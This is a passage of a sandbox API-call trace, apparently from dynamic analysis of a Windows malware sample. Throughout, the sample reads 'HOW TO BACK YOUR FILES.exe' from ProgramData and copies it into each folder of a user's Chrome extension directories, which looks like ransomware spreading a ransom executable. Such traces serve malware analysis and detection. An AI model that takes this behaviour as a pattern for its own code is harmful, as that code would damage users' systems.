halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.964] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.964] GetLastError () returned 0x0 [0104.965] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.965] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.965] CloseHandle (hObject=0x120) returned 1 [0104.965] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.965] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ca\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dc28140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dc28140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.965] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.965] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.965] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg" [0104.965] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.965] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.966] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.966] GetLastError () returned 0x0 [0104.966] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.966] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.966] CloseHandle (hObject=0x120) returned 1 [0104.966] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.967] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dc28140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dc28140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.967] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.967] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.967] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar" [0104.967] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.967] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.968] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.968] GetLastError () returned 0x0 [0104.968] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.968] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.968] CloseHandle (hObject=0x120) returned 1 [0104.968] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.968] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dc4e2a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dc4e2a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.968] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.968] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.968] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda" [0104.969] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.969] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.969] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.969] GetLastError () returned 0x0 [0104.970] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.970] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.970] CloseHandle (hObject=0x120) returned 1 [0104.970] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.970] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ab7660, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e41cec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e41cec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.970] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.970] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.970] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0" [0104.971] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.971] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.971] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.971] GetLastError () returned 0x0 [0104.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.972] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.972] CloseHandle (hObject=0x120) returned 1 [0104.972] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.972] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82651e90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dcc06c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dcc06c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.972] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.972] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.972] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata" [0104.972] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.972] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.973] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.973] GetLastError () returned 0x0 [0104.973] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.973] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.973] CloseHandle (hObject=0x120) returned 1 [0104.973] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.973] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x828e7880, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dcc06c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dcc06c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.974] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.974] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.974] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales" [0104.974] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.974] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.975] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.975] GetLastError () returned 0x0 [0104.975] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.975] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.975] CloseHandle (hObject=0x120) returned 1 [0104.975] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.975] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82665710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e443020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e443020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.975] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.975] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.976] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW" [0104.976] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.976] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.976] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.977] GetLastError () returned 0x0 [0104.977] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.977] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.977] CloseHandle (hObject=0x120) returned 1 [0104.977] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.977] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x828836f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6dce6820, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6dce6820, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.977] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.977] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.977] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN" [0104.977] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.977] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_cn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.978] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.978] GetLastError () returned 0x0 [0104.978] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.978] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.978] CloseHandle (hObject=0x120) returned 1 [0104.978] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.979] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_CN\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82879ab0, 